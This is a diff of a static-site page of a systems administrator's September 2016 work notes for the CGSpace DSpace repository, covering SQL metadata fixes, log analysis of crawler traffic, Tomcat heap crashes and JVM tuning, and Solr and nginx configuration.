<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;0e414b4c-4671-4a23-b570-6077aca647d8&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Campbell, B%&#39;;
UPDATE 166
dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Campbell, B%&#39;;
text_value | authority | confidence
------------------------+--------------------------------------+------------
Campbell, Bruce | 0e414b4c-4671-4a23-b570-6077aca647d8 | 600
@ -215,18 +215,18 @@ dspacetest=# select distinct text_value, authority, confidence from metadatavalu
<ul>
<li>After one week of logging TLS connections on CGSpace:</li>
</ul>
<pre><code># zgrep &quot;DES-CBC3&quot; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
<pre tabindex="0"><code># zgrep &#34;DES-CBC3&#34; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
217
# zcat -f -- /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
1164376
# zgrep &quot;DES-CBC3&quot; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk '{print $6}' | sort | uniq
# zgrep &#34;DES-CBC3&#34; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk &#39;{print $6}&#39; | sort | uniq
TLSv1/DES-CBC3-SHA
TLSv1/EDH-RSA-DES-CBC3-SHA
</code></pre><ul>
<li>So this represents <code>0.02%</code> of 1.16M connections over a one-week period</li>
<li>Transforming some filenames in OpenRefine so they can have a useful description for SAFBuilder:</li>
</ul>
<pre><code>value + &quot;__description:&quot; + cells[&quot;dc.type&quot;].value
<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
</code></pre><ul>
<li>This gives you, for example: <code>Mainstreaming gender in agricultural R&amp;D.pdf__description:Brief</code></li>
</ul>
@ -251,7 +251,7 @@ TLSv1/EDH-RSA-DES-CBC3-SHA
<li>If I unzip the original zip from CIAT on Windows, re-zip it with 7zip on Windows, and then unzip it on Linux directly, the file names seem to be proper UTF-8</li>
<li>We should definitely clean filenames so they don&rsquo;t use characters that are tricky to process in CSV and shell scripts, like: <code>,</code>, <code>'</code>, and <code>&quot;</code></li>
</ul>
<pre><code>value.replace(&quot;'&quot;,&quot;&quot;).replace(&quot;,&quot;,&quot;&quot;).replace('&quot;','')
<pre tabindex="0"><code>value.replace(&#34;&#39;&#34;,&#34;&#34;).replace(&#34;,&#34;,&#34;&#34;).replace(&#39;&#34;&#39;,&#39;&#39;)
</code></pre><ul>
<li>I need to write a Python script to match that for renaming files in the file system</li>
<li>When importing SAF bundles it seems you can specify the target collection on the command line using <code>-c 10568/4003</code> or in the <code>collections</code> file inside each item in the bundle</li>
@ -263,8 +263,8 @@ TLSv1/EDH-RSA-DES-CBC3-SHA
</li>
<li>Import CIAT Gender Network records to CGSpace, first creating the SAF bundles as my user, then importing as the <code>tomcat7</code> user, and deleting the bundle, for each collection&rsquo;s items:</li>
</ul>
<pre><code>$ ./safbuilder.sh -c /home/aorth/ciat-gender-2016-09-06/66601.csv
$ JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
<pre tabindex="0"><code>$ ./safbuilder.sh -c /home/aorth/ciat-gender-2016-09-06/66601.csv
$ JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
$ rm -rf ~/ciat-gender-2016-09-06/SimpleArchiveFormat/
</code></pre><h2 id="2016-09-07">2016-09-07</h2>
<ul>
@ -274,7 +274,7 @@ $ rm -rf ~/ciat-gender-2016-09-06/SimpleArchiveFormat/
<li>See: <a href="https://www.postgresql.org/docs/9.3/static/routine-vacuuming.html">https://www.postgresql.org/docs/9.3/static/routine-vacuuming.html</a></li>
<li>CGSpace went down and the error seems to be the same as always (lately):</li>
</ul>
<pre><code>2016-09-07 11:39:23,162 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2016-09-07 11:39:23,162 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
...
</code></pre><ul>
@ -284,7 +284,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<ul>
<li>CGSpace crashed twice today, errors from <code>catalina.out</code>:</li>
</ul>
<pre><code>org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
<pre tabindex="0"><code>org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
at org.apache.commons.dbcp.PoolingDataSource.getConnection(PoolingDataSource.java:114)
</code></pre><ul>
<li>I enabled logging of requests to <code>/rest</code> again</li>
@ -293,33 +293,33 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<ul>
<li>CGSpace crashed again, errors from <code>catalina.out</code>:</li>
</ul>
<pre><code>org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
<pre tabindex="0"><code>org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
at org.apache.commons.dbcp.PoolingDataSource.getConnection(PoolingDataSource.java:114)
</code></pre><ul>
<li>I restarted Tomcat and it was ok again</li>
<li>CGSpace crashed a few hours later, errors from <code>catalina.out</code>:</li>
</ul>
<pre><code>Exception in thread &quot;http-bio-127.0.0.1-8081-exec-25&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Exception in thread &#34;http-bio-127.0.0.1-8081-exec-25&#34; java.lang.OutOfMemoryError: Java heap space
at java.lang.StringCoding.decode(StringCoding.java:215)
</code></pre><ul>
<li>We haven&rsquo;t seen that in quite a while&hellip;</li>
<li>Indeed, in a month of logs it only occurs 15 times:</li>
</ul>
<pre><code># grep -rsI &quot;OutOfMemoryError&quot; /var/log/tomcat7/catalina.* | wc -l
<pre tabindex="0"><code># grep -rsI &#34;OutOfMemoryError&#34; /var/log/tomcat7/catalina.* | wc -l
15
</code></pre><ul>
<li>I also see a bunch of errors from dspace.log:</li>
</ul>
<pre><code>2016-09-14 12:23:07,981 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2016-09-14 12:23:07,981 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
</code></pre><ul>
<li>Looking at REST requests, it seems there is one IP hitting us nonstop:</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
820 50.87.54.15
12872 70.32.99.142
25744 70.32.83.92
# awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 3
# awk &#39;{print $1}&#39; /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 3
7966 181.118.144.29
54706 70.32.99.142
109412 70.32.83.92
@ -328,19 +328,19 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<li>I think the stability issues are definitely from REST</li>
<li>Crashed AGAIN, errors from dspace.log:</li>
</ul>
<pre><code>2016-09-14 14:31:43,069 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2016-09-14 14:31:43,069 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
</code></pre><ul>
<li>And more heap space errors:</li>
</ul>
<pre><code># grep -rsI &quot;OutOfMemoryError&quot; /var/log/tomcat7/catalina.* | wc -l
<pre tabindex="0"><code># grep -rsI &#34;OutOfMemoryError&#34; /var/log/tomcat7/catalina.* | wc -l
19
</code></pre><ul>
<li>There are no more rest requests since the last crash, so maybe there are other things causing this.</li>
<li>Hmm, I noticed a shitload of IPs from 180.76.0.0/16 are connecting to both CGSpace and DSpace Test (58 unique IPs concurrently!)</li>
<li>They seem to be coming from Baidu, and so far during today alone account for 1/6 of every connection:</li>
</ul>
<pre><code># grep -c ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-14
<pre tabindex="0"><code># grep -c ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-14
29084
# grep -c ip_addr=180.76.15 /home/cgspace.cgiar.org/log/dspace.log.2016-09-14
5192
@ -349,26 +349,26 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<li>From the activity control panel I can see 58 unique IPs hitting the site <em>concurrently</em>, which has GOT to hurt our stability</li>
<li>A list of all 2000 unique IPs from CGSpace logs today:</li>
</ul>
<pre><code># grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: '{print $5}' | sort -n | uniq -c | sort -h | tail -n 100
<pre tabindex="0"><code># grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: &#39;{print $5}&#39; | sort -n | uniq -c | sort -h | tail -n 100
</code></pre><ul>
<li>Looking at the top 20 IPs or so, most are Yahoo, MSN, Google, Baidu, TurnitIn (iParadigm), etc&hellip; do we have any real users?</li>
<li>Generate a list of all author affiliations for Peter Ballantyne to go through, make corrections, and create a lookup list from:</li>
</ul>
<pre><code>dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=211 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
<pre tabindex="0"><code>dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=211 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
</code></pre><ul>
<li>Looking into the Catalina logs again around the time of the first crash, I see:</li>
</ul>
<pre><code>Wed Sep 14 09:47:27 UTC 2016 | Query:id: 78581 AND type:2
<pre tabindex="0"><code>Wed Sep 14 09:47:27 UTC 2016 | Query:id: 78581 AND type:2
Wed Sep 14 09:47:28 UTC 2016 | Updating : 6/6 docs.
Commit
Commit done
dn:CN=Haman\, Magdalena (CIAT-CCAFS),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-193&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-193&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>And after that I see a bunch of &ldquo;pool error Timeout waiting for idle object&rdquo;</li>
<li>Later, near the time of the next crash I see:</li>
</ul>
<pre><code>dn:CN=Haman\, Magdalena (CIAT-CCAFS),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
<pre tabindex="0"><code>dn:CN=Haman\, Magdalena (CIAT-CCAFS),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
Wed Sep 14 11:29:55 UTC 2016 | Query:id: 79078 AND type:2
Wed Sep 14 11:30:20 UTC 2016 | Updating : 6/6 docs.
Commit
@ -376,7 +376,7 @@ Commit done
Sep 14, 2016 11:32:22 AM com.sun.jersey.server.wadl.generators.WadlGeneratorJAXBGrammarGenerator buildModelAndSchemas
SEVERE: Failed to generate the schema for the JAX-B elements
com.sun.xml.bind.v2.runtime.IllegalAnnotationsException: 2 counts of IllegalAnnotationExceptions
java.util.Map is an interface, and JAXB can't handle interfaces.
java.util.Map is an interface, and JAXB can&#39;t handle interfaces.
this problem is related to the following location:
at java.util.Map
at public java.util.Map com.atmire.dspace.rest.common.Statlet.getRender()
@ -389,7 +389,7 @@ java.util.Map does not have a no-arg default constructor.
</code></pre><ul>
<li>Then 20 minutes later another outOfMemoryError:</li>
</ul>
<pre><code>Exception in thread &quot;http-bio-127.0.0.1-8081-exec-25&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Exception in thread &#34;http-bio-127.0.0.1-8081-exec-25&#34; java.lang.OutOfMemoryError: Java heap space
at java.lang.StringCoding.decode(StringCoding.java:215)
</code></pre><ul>
<li>Perhaps these particular issues <em>are</em> memory issues, the munin graphs definitely show some weird purging/allocating behavior starting this week</li>
@ -402,7 +402,7 @@ java.util.Map does not have a no-arg default constructor.
<li>Oh great, the configuration on the actual server is different than in configuration management!</li>
<li>Seems we added a bunch of settings to the <code>/etc/default/tomcat7</code> in December, 2015 and never updated our ansible repository:</li>
</ul>
<pre><code>JAVA_OPTS=&quot;-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts&quot;
<pre tabindex="0"><code>JAVA_OPTS=&#34;-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts&#34;
</code></pre><ul>
<li>So I&rsquo;m going to bump the heap +512m and remove all the other experimental shit (and update ansible!)</li>
<li>Increased JVM heap to 4096m on CGSpace (linode01)</li>
@ -416,21 +416,21 @@ java.util.Map does not have a no-arg default constructor.
<ul>
<li>CGSpace crashed again, and there are TONS of heap space errors but the datestamps aren&rsquo;t on those lines so I&rsquo;m not sure if they were yesterday:</li>
</ul>
<pre><code>dn:CN=Orentlicher\, Natalie (CIAT),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
<pre tabindex="0"><code>dn:CN=Orentlicher\, Natalie (CIAT),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
Thu Sep 15 18:45:25 UTC 2016 | Query:id: 55785 AND type:2
Thu Sep 15 18:45:26 UTC 2016 | Updating : 100/218 docs.
Thu Sep 15 18:45:26 UTC 2016 | Updating : 200/218 docs.
Thu Sep 15 18:45:27 UTC 2016 | Updating : 218/218 docs.
Commit
Commit done
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-247&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-241&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-243&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-258&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-268&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-263&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-280&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;Thread-54216&quot; org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-247&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-241&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-243&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-258&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-268&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-263&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-280&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;Thread-54216&#34; org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb
-e14ef82ee224 to the index; possible analysis error.
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
@ -443,7 +443,7 @@ Exception in thread &quot;Thread-54216&quot; org.apache.solr.client.solrj.impl.H
<li>I bumped the heap space from 4096m to 5120m to see if this is <em>really</em> about heap speace or not.</li>
<li>Looking into some of these errors that I&rsquo;ve seen this week but haven&rsquo;t noticed before:</li>
</ul>
<pre><code># zcat -f -- /var/log/tomcat7/catalina.* | grep -c 'Failed to generate the schema for the JAX-B elements'
<pre tabindex="0"><code># zcat -f -- /var/log/tomcat7/catalina.* | grep -c &#39;Failed to generate the schema for the JAX-B elements&#39;
113
</code></pre><ul>
<li>I&rsquo;ve sent a message to Atmire about the Solr error to see if it&rsquo;s related to their batch update module</li>
@ -452,7 +452,7 @@ Exception in thread &quot;Thread-54216&quot; org.apache.solr.client.solrj.impl.H
<ul>
<li>Work on cleanups for author affiliations after Peter sent me his list of corrections/deletions:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i affiliations_pb-322-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i affiliations_pb-322-corrections.csv -f cg.contributor.affiliation -t correct -m 211 -d dspace -u dspace -p fuuu
$ ./delete-metadata-values.py -f cg.contributor.affiliation -i affiliations_pb-2-deletions.csv -m 211 -u dspace -d dspace -p fuuu
</code></pre><ul>
<li>After that we need to take the top ~300 and make a controlled vocabulary for it</li>
@ -474,7 +474,7 @@ $ ./delete-metadata-values.py -f cg.contributor.affiliation -i affiliations_pb-2
<li>Turns out the Solr search logic switched from OR to AND in DSpace 6.0 and the change is easy to backport: <a href="https://jira.duraspace.org/browse/DS-2809">https://jira.duraspace.org/browse/DS-2809</a></li>
<li>We just need to set this in <code>dspace/solr/search/conf/schema.xml</code>:</li>
</ul>
<pre><code>&lt;solrQueryParser defaultOperator=&quot;AND&quot;/&gt;
<pre tabindex="0"><code>&lt;solrQueryParser defaultOperator=&#34;AND&#34;/&gt;
</code></pre><ul>
<li>It actually works really well, and search results return much less hits now (before, after):</li>
</ul>
@ -483,7 +483,7 @@ $ ./delete-metadata-values.py -f cg.contributor.affiliation -i affiliations_pb-2
<ul>
<li>Found a way to improve the configuration of Atmire&rsquo;s Content and Usage Analysis (CUA) module for date fields</li>
</ul>
<pre><code>-content.analysis.dataset.option.8=metadata:dateAccessioned:discovery
<pre tabindex="0"><code>-content.analysis.dataset.option.8=metadata:dateAccessioned:discovery
+content.analysis.dataset.option.8=metadata:dc.date.accessioned:date(month)
</code></pre><ul>
<li>This allows the module to treat the field as a date rather than a text string, so we can interrogate it more intelligently</li>
@ -492,7 +492,7 @@ $ ./delete-metadata-values.py -f cg.contributor.affiliation -i affiliations_pb-2
<li>45 minutes of downtime!</li>
<li>Start processing the fixes to <code>dc.description.sponsorship</code> from Peter Ballantyne:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i sponsors-fix-23.csv -f dc.description.sponsorship -t correct -m 29 -d dspace -u dspace -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i sponsors-fix-23.csv -f dc.description.sponsorship -t correct -m 29 -d dspace -u dspace -p fuuu
$ ./delete-metadata-values.py -i sponsors-delete-8.csv -f dc.description.sponsorship -m 29 -d dspace -u dspace -p fuuu
</code></pre><ul>
<li>I need to run these and the others from a few days ago on CGSpace the next time we run updates</li>
@ -511,14 +511,14 @@ $ ./delete-metadata-values.py -i sponsors-delete-8.csv -f dc.description.sponsor
<li>Not sure if it&rsquo;s something like we already have too many filters there (30), or the filter name is reserved, etc&hellip;</li>
<li>Generate a list of ILRI subjects for Peter and Abenet to look through/fix:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where resource_type_id=2 and metadata_field_id=203 group by text_value order by count desc) to /tmp/ilrisubjects.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where resource_type_id=2 and metadata_field_id=203 group by text_value order by count desc) to /tmp/ilrisubjects.csv with csv;
</code></pre><ul>
<li>Regenerate Discovery indexes a few times after playing with <code>discovery.xml</code> index definitions (syntax, parameters, etc).</li>
<li>Merge changes to boolean logic in Solr search (<a href="https://github.com/ilri/DSpace/pull/274">#274</a>)</li>
<li>Run all sponsorship and affiliation fixes on CGSpace, deploy latest <code>5_x-prod</code> branch, and re-index Discovery on CGSpace</li>
<li>Tested OCSP stapling on DSpace Test&rsquo;s nginx and it works:</li>
</ul>
<pre><code>$ openssl s_client -connect dspacetest.cgiar.org:443 -servername dspacetest.cgiar.org -tls1_2 -tlsextdebug -status
<pre tabindex="0"><code>$ openssl s_client -connect dspacetest.cgiar.org:443 -servername dspacetest.cgiar.org -tls1_2 -tlsextdebug -status
...
OCSP response:
======================================
@ -533,12 +533,12 @@ OCSP Response Data:
<li>Discuss fixing some ORCIDs for CCAFS author Sonja Vermeulen with Magdalena Haman</li>
<li>This author has a few variations:</li>
</ul>
<pre><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeu
len, S%';
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeu
len, S%&#39;;
</code></pre><ul>
<li>And it looks like <code>fe4b719f-6cc4-4d65-8504-7a83130b9f83</code> is the authority with the correct ORCID linked</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set authority='fe4b719f-6cc4-4d65-8504-7a83130b9f83w', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;fe4b719f-6cc4-4d65-8504-7a83130b9f83w&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen, S%&#39;;
UPDATE 101
</code></pre><ul>
<li>Hmm, now her name is missing from the authors facet and only shows the authority ID</li>
@ -547,7 +547,7 @@ UPDATE 101
<li>On a clean snapshot of the database I see the correct authority should be <code>f01f7b7b-be3f-4df7-a61d-b73c067de88d</code>, not <code>fe4b719f-6cc4-4d65-8504-7a83130b9f83</code></li>
<li>Updating her authorities again and reindexing:</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set authority='f01f7b7b-be3f-4df7-a61d-b73c067de88d', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;f01f7b7b-be3f-4df7-a61d-b73c067de88d&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen, S%&#39;;
UPDATE 101
</code></pre><ul>
<li>Use GitHub icon from Font Awesome instead of a PNG to save one extra network request</li>
@ -564,14 +564,14 @@ UPDATE 101
<li>Minor fix to a string in Atmire&rsquo;s CUA module (<a href="https://github.com/ilri/DSpace/pull/280">#280</a>)</li>
<li>This seems to be what I&rsquo;ll need to do for Sonja Vermeulen (but with <code>2b4166b7-6e4d-4f66-9d8b-ddfbec9a6ae0</code> instead on the live site):</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen SJ%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;09e4da69-33a3-45ca-b110-7d3f82d2d6d2&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen, S%&#39;;
dspacetest=# update metadatavalue set authority=&#39;09e4da69-33a3-45ca-b110-7d3f82d2d6d2&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Vermeulen SJ%&#39;;
</code></pre><ul>
<li>And then update Discovery and Authority indexes</li>
<li>Minor fix for &ldquo;Subject&rdquo; string in Discovery search and Atmire modules (<a href="https://github.com/ilri/DSpace/pull/281">#281</a>)</li>
<li>Start testing batch fixes for ILRI subject from Peter:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i ilrisubjects-fix-32.csv -f cg.subject.ilri -t correct -m 203 -d dspace -u dspace -p fuuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ilrisubjects-fix-32.csv -f cg.subject.ilri -t correct -m 203 -d dspace -u dspace -p fuuuu
$ ./delete-metadata-values.py -i ilrisubjects-delete-13.csv -f cg.subject.ilri -m 203 -d dspace -u dspace -p fuuu
</code></pre><h2 id="2016-09-29">2016-09-29</h2>
<ul>
@ -580,7 +580,7 @@ $ ./delete-metadata-values.py -i ilrisubjects-delete-13.csv -f cg.subject.ilri -
<li>DSpace Test (linode02) became unresponsive for some reason, I had to hard reboot it from the Linode console</li>
<li>People on DSpace mailing list gave me a query to get authors from certain collections:</li>
</ul>
<pre><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/5472', '10568/5473')));
<pre tabindex="0"><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/5472&#39;, &#39;10568/5473&#39;)));
</code></pre><h2 id="2016-09-30">2016-09-30</h2>
<ul>
<li>Deny access to REST API&rsquo;s <code>find-by-metadata-field</code> endpoint to protect against an upstream security issue (DS-3250)</li>
@ -606,15 +606,15 @@ $ ./delete-metadata-values.py -i ilrisubjects-delete-13.csv -f cg.subject.ilri -
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -42,7 +42,7 @@ I exported a random item&rsquo;s metadata as CSV, deleted all columns except id
0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -72,12 +72,12 @@ I exported a random item&rsquo;s metadata as CSV, deleted all columns except id
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -124,7 +124,7 @@ I exported a random item&rsquo;s metadata as CSV, deleted all columns except id
<time datetime="2016-10-03T15:53:00+03:00">Mon Oct 03, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -139,7 +139,7 @@ I exported a random item&rsquo;s metadata as CSV, deleted all columns except id
</li>
